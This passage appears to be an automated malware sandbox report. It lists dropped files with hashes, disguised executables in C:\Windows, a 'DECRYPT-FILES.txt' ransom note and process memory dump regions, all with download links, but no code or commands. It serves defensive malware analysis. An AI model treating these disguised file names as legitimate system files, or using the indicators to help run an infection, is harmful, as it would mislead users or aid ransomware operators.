SHA256
d3ac2c10cc1cc472e18151738f16e20dbcea62093d3ecb9f6e730b75a6f183c1

SHA512
9adc69512015fc8cfaa73113db4e18295012da6ff1c501e5ec3a065e77aaa5791edce3a6935b083fed8514fba0b47501aefac0046380ab36a82c416f40947966

Download Submit
C:\Windows\directx.sys

Filesize
279B

MD5
4ae2201f78164f4aa64292eb6ee7bc27

SHA1
54b4cd7e5f7444a50c672549605401772a6f7941

SHA256
12913b54d06d499164d792a2b1009ecac5b0b6b9bd20f8a84610d1ff68c92cc9

SHA512
9f7f010cad91690ceebbdb0329aaa344752b97da69571bf55e779d5c9e00f1866d82d02b836c0c9aa9143a17de52463d9a0d5471c98949626739dc3c141cdd5f

Download Submit
C:\Windows\directx.sys

Filesize
305B

MD5
faafd61833b4f83af0610562b5fc8dac

SHA1
f55dd1fbae7bc6b776db463caeb3641465cf7a65

SHA256
5d06ed27fa956b743cf1fb7af7a5dc653eb4b2b60a132565898d45b95bb7e99a

SHA512
02c3946b384fbe0be34470cb8ec40a0a8a8b715702ddaff670c4c8638e2162d7cf66b583258045e037c6728b135df1d078be5a5709272afb399a5b95feeb8985

Download Submit
C:\Windows\directx.sys

Filesize
61B

MD5
77344de4d46a6f497ce3ed590876999d

SHA1
8a5bfe8573c7cb8fe6420f09bc3266fdb37e1178

SHA256
919f0c9536aca98e8f38b469f5222a9e146aa6f1193b69741dec50e4b257c27b

SHA512
10c65625e1a1a65bac033136aa1e5020bdf6a1ae744603033b25bf2fbc36f53b1385e1aaed3f1bfc130fb6a776366fbedeee5cf9c2e62866b00a3f3dcdf83724

Download Submit
C:\Windows\directx.sys

Filesize
241B

MD5
a9b52fd48264f5df808bac1aaf929f88

SHA1
05076a823311d1fd7646d2f70b5ec4cba8e9c85d

SHA256
5b39ddd57ad7bad98a5a4237ed97a27094f48c85ab0bafa8c25d3eb2aba1f9e0

SHA512
b1fe89da496bef2ca6dcc7810af29666967abbc09ad33dfe57778303c30d44d3dda4f6951b172c0e57c12e2fc58f26f1023d0e49eba22f0a59f2bb76158adc82

Download Submit
C:\Windows\directx.sys

Filesize
242B

MD5
9ea969c8544212f3b796371ca3daad94

SHA1
3266c971f550131e24abcbcd8a6b18a34083b241

SHA256
fd2def74f3caf5b3f3881602ba03685b8a1e99ad0e7764520ae40e204cc583de

SHA512
8474b529b1794a4c2f9aaf491d622cb66c2fae4012fecae6aae0892471af3a093aff869a238375b72504bc7681e48e578ed53580cc4cef8243deeee531bd0708

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
9a295adbd3df03d3dd13a249b4c1e412

SHA1
58806cad5312ef7414db18a2a1ed4290b3dad97e

SHA256
9b0b4248a4efa6f8590a4c47ae631176bc91c98e9fc6f720b18bf2901a032e74

SHA512
b605f320fc3bfe8e17154f04c76afc4ff885d57e76a716af0f089ef91d048ff05dcaa85439541bf2fbfd9aa9837e7b61208b32239e3072ff0e1e4154668bdd64

Download Submit
C:\Windows\directx.sys

Filesize
249B

MD5
2b236369511ad7929cf5b7c069728536

SHA1
be5b40859c15bffe1d8942fea18faa9d62d26b68

SHA256
3692bae585496a1481352295349b9ed31eca4d8e7d7ac4321b2657923fac6696

SHA512
6bcb41ce0e5bf475874b9f73a47da54e3ce33d2c36348dbcc3b07df65e9884f958e2485ee38bbfb66e94a05bcb2dd9f5527d4c31aeb052a3ae87eb46283bf77f

Download Submit
C:\Windows\directx.sys

Filesize
246B

MD5
233771fcb4b0c14f98a4e05672344bac

SHA1
20a3a68f307178939e630f0fd8f3f47a6fcbb004

SHA256
befc7fbaa8700591c70d39cffcabbd21c6b5a2ca2c3fd94db01eb9a3ef49d612

SHA512
f82709d28f529ee2feb2d41adf59b11d45aae4c45db4806a6d39a482f8922db15dc48ac27c6e980655fc76bf10041a4ddb2aed7c4c250a0e4b18e1e251fb49be

Download Submit
C:\Windows\directx.sys

Filesize
244B

MD5
91342124351924d34be109371a613f27

SHA1
a7feac928ab848da686be8706d8bf17f267d39f5

SHA256
e7c91593b1ce467d7368e0b6bb8766816819b0eb9fe9df3430e94e1b11656278

SHA512
a4bfa0cbdaeb826245964efb1c5c5aaf7d5366a4aeb3c63f163cafa829ae35f2c652c7618a1caeee232b6733e6d69a7ec27d267cb0dd6001e28bbbeaabc746d9

Download Submit
C:\Windows\directx.sys

Filesize
250B

MD5
edd331ff06ae80228d1a19915223023b

SHA1
e60a838faadf8dc62482ff26133f4b96c123c0fa

SHA256
13a610ee3a7fefd650a773234d2b1cbebb67285247b0018edd9e54de2b24853c

SHA512
c3b014094a943b837baf1932f13a2c5eed98f6b3f29814dad9a2fa8bdcf7583f0b7c40686790a3ba14c0a5b868e7676cd5989635b3da111f3312cee34edbc5db

Download Submit
C:\Windows\directx.sys

Filesize
241B

MD5
66817bf3b954c58fc4ddf75be9690aed

SHA1
da12026d35b2ad2eecda9f8840f2a62c73e72d53

SHA256
59ae3c5e8b2c5bdc54e254d2fa5281cb75fa87977e509f8e66f1110d0042a8c8

SHA512
85d9491b1003518a78eb8a3e5b06881e61f9a5d2c2840e7ff9907e14bff1746c88a20626283ceb2f5bc216a70c8751af1b7204c44963a85cb2a95f53ad7d76dc

Download Submit
C:\Windows\directx.sys

Filesize
250B

MD5
0821096f770bd94fdcebcac2859cb0a5

SHA1
599a57fa3de236db05b36508e41accbecde2c0dd

SHA256
3d0ba264a6609c073a64082f3efbc536e7f99b4e92a78b04ee2788f7b476ad44

SHA512
c5c3fdc559506055335b7082c775386d45582d316ac489e1241e2c0925cc53374eb43729c146019386b318f59b4739feddff3c1e421a9e0baeee96a215b75760

Download Submit
C:\Windows\directx.sys

Filesize
244B

MD5
d9a483d1c4b59b91a0fc6a92e216bafd

SHA1
ae2c325b876e07cc1d462b92065cd7e75ce3729f

SHA256
1f25b9ffe7c5412796fdd8e9e2cacb82fea9ef2efcd7b03c23794981889a797f

SHA512
4117793ac23d135b467d20aeb9d5335740d2f9bcf5da5dbc67294674aa17866ed41474ca26a10dffb2488c4d32a41d283cde22ba247c0662c9df81ad21190752

Download Submit
C:\Windows\directx.sys

Filesize
24B

MD5
c93ff55f5c5a9e2323b2f5d677bdbee1

SHA1
3e1c36c7d34bafad15e140ce5b03734f6aa87d1d

SHA256
15a9b8e44230a9fef940f579e061c1db4244d2aae8a68f6139227b034e9f28cc

SHA512
8912432056d997f4847afcebbe0dca43e3d8bc249d539ebf937ab77871d797d6f84ff860fbccec6bffab898bf18edb30ea5805e8ed8c63e05a3272b0e512aa3a

Download Submit
C:\Windows\directx.sys

Filesize
250B

MD5
a2396f82b240a809ffcc6b7ef98cdb19

SHA1
b9901d35702b6a99b5227fc422d8968a7413d1fd

SHA256
e1e3248c85daf60b079bb15f1b58c5894c26ba0eca7d5afaa5cf320a5bcdd7f7

SHA512
9ebe5a0a32cd0e44976ef2a568b4eba8e0c5c4ab1b080cd2faf5d51062fa2806e3055710ac048dda9d2cdc36152d2c2768c57c405adfa3fd380b56b38c86eb78

Download Submit
C:\Windows\directx.sys

Filesize
250B

MD5
788cf1f4078189d07dafbfd1a3ea0436

SHA1
3b25a64b3ab9edd24de004df248d98eefc70657f

SHA256
f9a3518310b142f1891d232b715202cd972bb84e198203f6a8c9a74236d0d56f

SHA512
1154e2cf1c4611e6950ee5faaa6bf6b35c2d95bd0c55fd3e2e07fed65b6fdb386d54c12040e3d34df955adb1b050b6c18c223230b2dcef61a44198dcb48284f4

Download Submit
C:\Windows\directx.sys

Filesize
250B

MD5
3425644165cb60eb9df3293812e358a5

SHA1
182cb222cd23ec44760b91dfc1820f99a3509ad8

SHA256
797eaa2711df9fc656dcea16677a8a582e2b0d513157b0c5c1c9eb7974b82f6d

SHA512
73170453a8dcd0d687f7ca724cde91f944c7ff9e6749a96629b7cd437feeea8421fd405a51cb3dab5882ab13dfacfcf8eb388783b64bbe65897121d9187667e9

Download Submit
C:\Windows\directx.sys

Filesize
247B

MD5
efc34dbbfa020a11afafd22078b68e46

SHA1
027f236df248825eead8c04f87266f517d09cb26

SHA256
2d0bd576f3ff2d4889f6fac9e3a72bc7c2d2e8ad1bb76e71d009944a6e4beae8

SHA512
0b599134df21504729174f063d78ded8361620d16055b56b7ea4d98e464b72ce0232b2e41f5b8976528a69a21ca54f3144a6c711d18b1b73bd5703dba2501e17

Download Submit
C:\Windows\directx.sys

Filesize
249B

MD5
950863c91e1977eed108b28e8f829ced

SHA1
44a3eaf9d4a7df34dd7e05954a776d60e8541a4a

SHA256
499dacabbd55885c4a03e3570f4086a31f6c0b4662ad52cea46c8902690bf133

SHA512
95231449a1596c98142e933402a6d3e92be2d6124316fc476c1c80ef34a9ae49da3e656e256da67466ddf1e106365e8c8dde84960dfdb16ed8627cfea10bfeea

Download Submit
C:\Windows\directx.sys

Filesize
250B

MD5
5218b4bd0a9b96e470d2ebeaaa98f305

SHA1
2425cad1c759b3f0218c450deeade1df491464b8

SHA256
29648a1bddc314c11b56ae698f82281ba758d7884ee50e65b34684c479d0126b

SHA512
8c7c1715d5595da186a4370f1779cfd1bc16f1cfa976e25221135e6cd5177c71cc182cfc39ca78163ddd5bb21f8a26b3c852b8c118a31bddf5f342c8e452a91d

Download Submit
C:\Windows\directx.sys

Filesize
250B

MD5
0913b37917ade26bfe1d375e3c8dd5ce

SHA1
21ec1c0a81d1f6a1c8d7975359e38be818000615

SHA256
768bf787e60addbc68f60958ca87ada803087f31eb7aff7ecf4579eab9f09ae7

SHA512
83ad1f31191bdc8df3feee6c2938687a6c8c02a9de48360a7326b41ed2949c2b74a4826aa05f08ed28e8cbe150a3259b84c3561840de4e97b33b89646a025f8e

Download Submit
C:\Windows\directx.sys

Filesize
278B

MD5
0f847abd1229dacbbc9cb20300b5cf9c

SHA1
52787c6aa4204ac2102756ccb67e6bafda275e02

SHA256
456814222e09170589e00cad9a1da7ffc124ce1be9a9f8b1e48169370f79fcf1

SHA512
1db1dd0e288bc005f9812f9c135e5c627c5631fd311b2cbaf1ba4f3c1a65570747a2e7b8b654d67ccedd9b54bc5fda8b5519064a69bdae5184a7f94d0f84ced8

Download Submit
C:\Windows\directx.sys

Filesize
311B

MD5
14c70e23439781c77e3c89f7aa550f09

SHA1
59cae981a84ec2668cbad2df228d47434328ce64

SHA256
9a28d14782ce6abfdc432ef21d7d670e6e0645f48803a2f21929c46f6eb50481

SHA512
1a49f0f5117d2a9a34e9c9fdfc1ee05595350f42b3aebb40715b1d643ca438773b08dfca4188c9d94f90eb58e1de889206dd7f941c75f8fd85bcec00920a97d6

Download Submit
C:\Windows\directx.sys

Filesize
307B

MD5
79d9bdd0fb327bde0e1b27ef704121a2

SHA1
c884707f7101ca244070a1552095e0ad73d2847f

SHA256
5630b32436ba6a1239c710a76a0218faa5d55c3f4ac1f572bf33f2930a4d1290

SHA512
6e5a66cf5b5f3680447bf53804923513d029874f3312600aad5c81702462308c1ee42b75acfec3ac7574504ea5c9e442e18312df53c04e3385a4c855451d3ce4

Download Submit
C:\Windows\directx.sys

Filesize
310B

MD5
21739a5303add1cffc83441b48981a6d

SHA1
8a233126f85a4057b15887c9bb91e69237aab36e

SHA256
35f1da14a6f84ea71fdc33a2299f7eba5c93828eaa1f7ec4b08ec03b5e94dd42

SHA512
dcf7addac136ba975898cb636e6ce4b682e5ca35b67cf7f8d4b0736f7f6e5be2b2ca3256a6f094067a6087574c68c7373cadb0719572481c32cf37e8204ccbc3

Download Submit
C:\Windows\directx.sys

Filesize
311B

MD5
03740aa1168b410a71632a0cad2360d7

SHA1
801d3170a35bd0e592d8319f1aedabe0cc7c5c38

SHA256
0f398816dfc452689363844e1e1a74a0b90b2a45b2c6fb1858f013d1061c9fb3

SHA512
507de703e641bf4312db0dfd6245e6442b40e713c3783f585ae62d6e00f803a95bd817d936c242d790795deed0be8176246f9dcd1d00248bdca1c822bcef7aac

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
d1fc0c3503d588ced97e59c84e508244

SHA1
46de19b96ca2abad066192a29323ca87eed701f2

SHA256
f4908889afec275fecbd8f75c689205381a081b148115475f9cbd832f7461254

SHA512
8338e7a16ff199120f1a886b87586d8cc62e15ea963019d13511fea7e005de7d741ea2f8a3194804f6eb1201f64f6be4b011007535db5e2432e5eb27275385e7

Download Submit
C:\Windows\directx.sys

Filesize
296B

MD5
e4441f68e731fcaeb3b732a9f59888de

SHA1
ef8d4174a240aefbfbbe7749b598367ae5484339

SHA256
286ddf1f0095ba58ad146ccb0d35d17b2b61677b778988fa369467110b965914

SHA512
f7e79e0ddd08544a386db519c5afb2efc2a7619df001b81dd89253bae0ec306e96de33dec0186df40fac16f2864ce62c28afb1bcf0d55719d7588be510297d09

Download Submit
C:\Windows\directx.sys

Filesize
296B

MD5
7ce7e15530ecb5ea1ae504353a3ab36a

SHA1
3bb1402b4506680389fe765de61aea37a16b63bc

SHA256
b7a609fe82c645e1849e533f2aef203d44981214833437236753f9abcc7617e7

SHA512
f6875d3b24ed720375d7bd2961cf61c04e8fb895046a1186957c4d631127a66752f8cad3bd226e3356a9c35f99db97da48f876f35b7c1ef4400f9ecc2871ec8a

Download Submit
C:\Windows\directx.sys

Filesize
296B

MD5
c9f217e38b6cc30c537bd8c650526dcd

SHA1
85afc453118c37fe949489898fe560dab392cfec

SHA256
3218208ce9298463abfecd597ba23676378450d86ba16a78f8c3f110b600cfc5

SHA512
5633875b0e3ea5fe59f762ee7fab80ed5874cdc1552ccdde1b8816559b0bcd89f0b58789d0359cedc521eb02461368318406a9b1c6525260be114d80944b00ef

Download Submit
C:\Windows\directx.sys

Filesize
296B

MD5
28fb8519f0c615f6acbe8c2bf09cfe84

SHA1
02ba6a33aed5a76f3cd5c32e926c056ababea64d

SHA256
4b048c659b54d9db7a095dcb92f7ce8d60c31cd77d32315d47aa925251b28efe

SHA512
543f9cdc7ac62f57e7531fb99fff5dd5509016ca7d441a7dd5b7337a7f2c8346a263ba2c2beb089228dcf2c24aab7d95517d1ac484c4f468d89d178837b0dc46

Download Submit
C:\Windows\directx.sys

Filesize
287B

MD5
cf108147fcc408e4f076d69de461794c

SHA1
ff961599027b2e230b752294344251064389345b

SHA256
1b8d41345ab2f4250b23553226a1e578fb630ffc1ef84de05115de913c02b854

SHA512
7ff749985b443c2f7c5f769bf9e95e8f52f88fd6efe0c9df5d426bb1155a9acb4f05ca0e477631dd05f955cdcd127e0173d594e2d1c2d2935ec6458fa684b40c

Download Submit
C:\Windows\directx.sys

Filesize
363B

MD5
0b8ee78a1ac31e3c3d011e81de274765

SHA1
c5c75ede60e4502cce468eeabb86534520f1e85d

SHA256
95aac5ba81c58cb8c3cedc20d66791f03114c5baed0b4299a9085f929ea37259

SHA512
aa8db03f280b90cac5070a5d45ea6368ac1e184c780ed78811377cd9a2f66cba981d251b4d638ab4159288ecf048b7572bb49684d9fb82a53e3fd63d58a04076

Download Submit
C:\Windows\directx.sys

Filesize
363B

MD5
08df9212be27172a0af0ad7ffdc2c1ac

SHA1
b104374ff6edc1c5b53e6730861159339dadc852

SHA256
06df601ddcc8ab070d7042c55d09afdf423eee0822c033084965c5e8ad5e0053

SHA512
bdaf51e5880f8bc0082b5577f1f86e63fb5708aaf9523363d3637a96a5ae3b1d0a06a4cf782c698b0342844d8fd1b3888f1891222f9736de7aeecce64f669843

Download Submit
C:\Windows\directx.sys

Filesize
439B

MD5
86c30ea7f0820af3e716daee248b9e6e

SHA1
6732f6850c11d9bd9f0dfa6276468e00d81af8db

SHA256
4f08e2a228e57284aa74364651a29581e2a33ecd6b5846567435b7a1b83b34c9

SHA512
8cc990d56506569f0416c84f4a575b59e041b605dcbb67f614f737f78588fe76c3c617ebd45f217b3ee3cff72d56f4615b232f34ead0f3669d12b543b4760930

Download Submit
C:\Windows\directx.sys

Filesize
486B

MD5
bdf9948819de8de5984b15e60c33bf37

SHA1
ad51109687fbdadaad05b6f487386c3e645fd09a

SHA256
165f9c4b82f4959369bd8c97abcae1f8325ccda4b9c319c091e2cef88a63185d

SHA512
76b9344c2baf756bd817006982b3dbb138f5e9c9b5e69c7a5bfa2638106791c61056159f40160db74a9c20cd7a5d8ad169e838602811810146f985ce03f0ace6

Download Submit
C:\Windows\directx.sys

Filesize
401B

MD5
cd4dd8577d5acea663d69ee92eba31a0

SHA1
5cb758cd2e254b3c789753d7c9881bd475269b6a

SHA256
b92f169324a77a6b9cb8d45c73c3b03efb021eff436d6b7cd4395f782acd188d

SHA512
65bacd4ab0da93522bd200d4d627cded9fdb8621afaa508fa9774cb597aff2e318537f085d651fa7e5ac9cf227e556e97aeaae3219e7eda07b84322cf5df322a

Download Submit
C:\Windows\directx.sys

Filesize
448B

MD5
757240f72bcdbba358eed257a681bf3a

SHA1
ce350846878119a3de5425a0f2c2bff253375d24

SHA256
1be01dc7c6671ffeb984a28fe469e1f8b0625867da0e8659c1a51dc14e12fb11

SHA512
b4ea39c522fe5a7fb192510bbb66c3263d4564ebba5e860e6848f9ec0d866f9b46870840637c88e70d83fb5308ff5acb477f4070cfcc43df1529fe88abbf252b

Download Submit
C:\Windows\directx.sys

Filesize
408B

MD5
a5ed4a458dbfed03529dd124aaf34b3e

SHA1
0ca2a0dcc05717247dbc870eab75571b4b2e1cfb

SHA256
04f4413f98465754a184e6ab2247394bf0f094b3140d847b2a03958c1c22f62c

SHA512
5f4267cb9ddb728326a343f1b05ddeb3af79dadddf5372c20b8c6c104c4172b359c6cca97b18a049c0d02bd2f566413733898c5d04535e488f8317a163f919ba

Download Submit
C:\Windows\directx.sys

Filesize
397B

MD5
7e33fe03360dd694685db962384d35c6

SHA1
3d0be6dc3458580d80ab75b39ec34a61e8d2ccea

SHA256
e6173e52524fa0bace3fe9d4ad6476e51d75aed301db3f101d13b7dbc06bc613

SHA512
525dcbf8d36af2b436589d969b8c395fe108aefff5b0f07b6ac4fbfbac77acbd524da1d7efd58fb213587627d79c75638fcaa3747cc1786087731886482078c6

Download Submit
C:\Windows\directx.sys

Filesize
86B

MD5
f885d87964363b63dd02fa0764914e34

SHA1
f4040260ce0513af83c51129835e39fc1dc5b8cd

SHA256
6fe00c54216384322f650a0eee44b055009039ebb425ed0c07c458e32c97740f

SHA512
054af68bcf1bbfe0721fe210d9a56fa5d43bef94107c45c84e34edea6df9d05ea4d7e019a1c25d2e6568d903992164ed12f5e58dc7fb866956e0b41a56f61b1b

Download Submit
C:\Windows\directx.sys

Filesize
425B

MD5
72cd49a02a3e209090116ee56db85388

SHA1
594b21aecfb4f30cf44d71411c333ee618c9aa33

SHA256
6d2a99560c5b5be279bb9b67bf283104fadf11ca41d99eff9cec50c1dffba4f8

SHA512
db5d9429f401dedaceb5786a0f9c7b4a9f1ad161fb8143c5010c623ca2c455a7bbaef2da67553b6f1d734cc0313021d2f922e69d70bab252fab9eb5631ae15a7

Download Submit
C:\Windows\sysdinrdvs.exe

Filesize
84KB

MD5
161a475bfe57d8b5317ca1f2f24b88fa

SHA1
38fa8a789d3d7570c411ddf4c038d89524142c2c

SHA256
98fb81423a107a5359e5fc86f1c4d81ff2d4bc73b79f55a5bf827fdb8e620c54

SHA512
d9f61f80c96fbac030c1105274f690d38d5dc8af360645102080a7caed7bad303ae89ed0e169124b834a68d1a669781eb70269bf4e8d5f34aeef394dd3d16547

Download Submit
C:\Windows\syspplsvc.exe

Filesize
85KB

MD5
10ffc145e1c09190a496a0e0527b4f3f

SHA1
e21fba21a11eecb4bc37638f48aed9f09d8912f6

SHA256
80b7e224f28c6160737a313221b9fc94d5f5e933ae1438afef4b5fae33185b2d

SHA512
bec357e73376f2e9e2963db5f7110a4c90de31a94edfaa7bf59c2f01b7bdd0c33e9a8024e995b7f0e67e332bc4aa0ec1280c7c28a24ba554772f8325e1badd1d

Download Submit
C:\Windows\winakrosvsa.exe

Filesize
14KB

MD5
2f4ab1a4a57649200550c0906d57bc28

SHA1
94bc52ed3921791630b2a001d9565b8f1bd3bd17

SHA256
baa6149b5b917ea3af1f7c77a65e26a34a191a31a9c79726bd60baf4656701fa

SHA512
ab1a59aa4c48f6c7fcf7950f4a68c3b89a56f266681a5aabd0df947af8340676e209d82ddd1997bfebd972b35ca235233b61231335aec4567f7b031e786ea7e8

Download Submit
C:\odt\DECRYPT-FILES.txt

Filesize
10KB

MD5
01b4c4aefff3cf04e547bf5996a48228

SHA1
af8c953db15264367a68fbe75a4208c8215fa6b3

SHA256
0f4b81c09e23c58fa31e50a5ee435c66f885b7f48e57665d4d5e9a722e388c84

SHA512
ea692e7cf116835ed1638d1a3137f3abe745a4c2319825cea221d50df54c681cd722ea2a87f85870448a5f685fd15fdd83b2955f5fafce4e8ec63d765de57407

Download Submit
C:\odt\OFFICE~1.EXE

Filesize
5.1MB

MD5
02c3d242fe142b0eabec69211b34bc55

SHA1
ea0a4a6d6078b362f7b3a4ad1505ce49957dc16e

SHA256
2a1ed24be7e3859b46ec3ebc316789ead5f12055853f86a9656e04b4bb771842

SHA512
0efb08492eaaa2e923beddc21566e98fbbef3a102f9415ff310ec616f5c84fd2ba3a7025b05e01c0bdf37e5e2f64dfd845f9254a376144cc7d827e7577dbb099

Download Submit
memory/276-2896-0x000001F7CEC00000-0x000001F7CEC22000-memory.dmp

Filesize
136KB

Download
memory/984-76-0x00000000014B0000-0x00000000014E1000-memory.dmp

Filesize
196KB

Download
memory/984-89-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/984-389-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/984-495-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/1076-1050-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/1144-1710-0x0000000000220000-0x00000000006C4000-memory.dmp

Filesize
4.6MB

Download
memory/1324-1151-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/1492-86-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/1604-2389-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/1844-1056-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/1844-201-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/1844-106-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/1844-434-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/1844-213-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/1844-98-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/1844-300-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/1844-94-0x00000000022A0000-0x000000000236E000-memory.dmp

Filesize
824KB

Download
memory/1844-206-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/2132-168-0x0000000071DA0000-0x0000000072351000-memory.dmp

Filesize
5.7MB

Download
memory/2132-358-0x00000000016D0000-0x00000000016E0000-memory.dmp

Filesize
64KB

Download
memory/2132-165-0x0000000071DA0000-0x0000000072351000-memory.dmp

Filesize
5.7MB

Download
memory/2132-163-0x00000000016D0000-0x00000000016E0000-memory.dmp

Filesize
64KB

Download
memory/2132-492-0x00000000016D0000-0x00000000016E0000-memory.dmp

Filesize
64KB

Download
memory/2584-478-0x00007FFEF6070000-0x00007FFEF6265000-memory.dmp

Filesize
2.0MB

Download
memory/2724-468-0x0000000000610000-0x000000000066E000-memory.dmp

Filesize
376KB

Download
memory/2724-452-0x0000000000610000-0x000000000066E000-memory.dmp

Filesize
376KB

Download
memory/2724-482-0x0000000000610000-0x000000000066E000-memory.dmp

Filesize
376KB

Download
memory/2912-178-0x0000000004ED0000-0x0000000004F6C000-memory.dmp

Filesize
624KB

Download
memory/2912-167-0x0000000000500000-0x0000000000508000-memory.dmp

Filesize
32KB

Download
memory/2912-162-0x0000000072490000-0x0000000072C40000-memory.dmp

Filesize
7.7MB

Download
memory/2912-303-0x0000000004E50000-0x0000000004E60000-memory.dmp

Filesize
64KB

Download
memory/3368-1072-0x0000000071DA0000-0x0000000072351000-memory.dmp

Filesize
5.7MB

Download
memory/3644-1036-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/3672-298-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3672-429-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/4120-1047-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4388-80-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/4388-301-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/4940-302-0x0000000000400000-0x000000000068E000-memory.dmp

Filesize
2.6MB

Download
memory/4940-154-0x0000000002640000-0x0000000002641000-memory.dmp

Filesize
4KB

Download
memory/4940-469-0x0000000000400000-0x000000000068E000-memory.dmp

Filesize
2.6MB

Download
memory/5232-306-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/5232-481-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/5304-1812-0x0000000000400000-0x0000000002D45000-memory.dmp

Filesize
41.3MB

Download
memory/5304-486-0x0000000002F90000-0x0000000003090000-memory.dmp

Filesize
1024KB

Download
memory/5304-487-0x0000000002EE0000-0x0000000002F4C000-memory.dmp

Filesize
432KB

Download
memory/5304-490-0x0000000000400000-0x0000000002D45000-memory.dmp

Filesize
41.3MB

Download
memory/5452-373-0x00000000008F0000-0x00000000008F1000-memory.dmp

Filesize
4KB

Download
memory/5452-491-0x0000000000400000-0x0000000000705000-memory.dmp

Filesize
3.0MB

Download
memory/5488-494-0x0000000002E40000-0x0000000002F40000-memory.dmp

Filesize
1024KB

Download
memory/5488-499-0x0000000004930000-0x0000000004957000-memory.dmp

Filesize
156KB

Download
memory/5488-508-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/5488-500-0x0000000000400000-0x0000000002D22000-memory.dmp

Filesize
41.1MB

Download
memory/5544-1109-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5776-1048-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/5804-388-0x00007FFEB60F0000-0x00007FFEB6100000-memory.dmp

Filesize
64KB

Download
memory/5804-396-0x00007FFEB60F0000-0x00007FFEB6100000-memory.dmp

Filesize
64KB

Download
memory/5804-399-0x00007FFEF6070000-0x00007FFEF6265000-memory.dmp

Filesize
2.0MB

Download
memory/5804-391-0x00007FFEB60F0000-0x00007FFEB6100000-memory.dmp

Filesize
64KB

Download
memory/5804-425-0x00007FFEF6070000-0x00007FFEF6265000-memory.dmp

Filesize
2.0MB

Download
memory/5804-390-0x00007FFEB60F0000-0x00007FFEB6100000-memory.dmp

Filesize
64KB

Download
memory/5804-437-0x00007FFEF6070000-0x00007FFEF6265000-memory.dmp

Filesize
2.0MB

Download
memory/5804-420-0x00007FFEF6070000-0x00007FFEF6265000-memory.dmp

Filesize
2.0MB

Download
memory/5804-405-0x00007FFEB60F0000-0x00007FFEB6100000-memory.dmp

Filesize
64KB

Download
memory/5804-404-0x00007FFEF6070000-0x00007FFEF6265000-memory.dmp

Filesize
2.0MB

Download
memory/5804-480-0x00007FFEF6070000-0x00007FFEF6265000-memory.dmp

Filesize
2.0MB

Download
memory/5804-421-0x00007FFEF6070000-0x00007FFEF6265000-memory.dmp

Filesize
2.0MB

Download
memory/5964-476-0x00007FFEF6070000-0x00007FFEF6265000-memory.dmp

Filesize
2.0MB

Download
memory/5964-454-0x00007FFEB6020000-0x00007FFEB6030000-memory.dmp

Filesize
64KB

Download
memory/5964-477-0x00007FFEF6070000-0x00007FFEF6265000-memory.dmp

Filesize
2.0MB

Download
memory/6020-643-0x0000000071DA0000-0x0000000072351000-memory.dmp

Filesize
5.7MB

Download
memory/6020-455-0x0000000071DA0000-0x0000000072351000-memory.dmp

Filesize
5.7MB

Download
memory/6020-493-0x0000000071DA0000-0x0000000072351000-memory.dmp

Filesize
5.7MB

Download
memory/6020-446-0x0000000001890000-0x00000000018A0000-memory.dmp

Filesize
64KB

Download
memory/6072-613-0x0000000002A40000-0x0000000002A4C000-memory.dmp

Filesize
48KB

Download
memory/6072-654-0x0000000002A50000-0x0000000002A5C000-memory.dmp

Filesize
48KB

Download
memory/6072-1940-0x00007FFED58B0000-0x00007FFED6371000-memory.dmp

Filesize
10.8MB

Download
memory/6072-427-0x0000000000930000-0x00000000009C4000-memory.dmp

Filesize
592KB

Download
memory/6072-537-0x0000000002A20000-0x0000000002A2C000-memory.dmp

Filesize
48KB

Download
memory/6072-573-0x0000000002A30000-0x0000000002A3A000-memory.dmp

Filesize
40KB

Download
memory/6072-485-0x000000001B7B0000-0x000000001B7C0000-memory.dmp

Filesize
64KB

Download
memory/6072-498-0x00007FFED58B0000-0x00007FFED6371000-memory.dmp

Filesize
10.8MB

Download
memory/6124-474-0x0000000071DA0000-0x0000000072351000-memory.dmp

Filesize
5.7MB

Download
memory/6124-472-0x0000000001080000-0x0000000001090000-memory.dmp

Filesize
64KB

Download
memory/6124-467-0x0000000071DA0000-0x0000000072351000-memory.dmp

Filesize
5.7MB

Download
memory/6124-501-0x0000000001080000-0x0000000001090000-memory.dmp

Filesize
64KB

Download
memory/6660-1800-0x0000000000C40000-0x0000000000CA2000-memory.dmp

Filesize
392KB

Download
memory/6712-1478-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/6836-2721-0x0000000000AB0000-0x000000000100A000-memory.dmp

Filesize
5.4MB

Download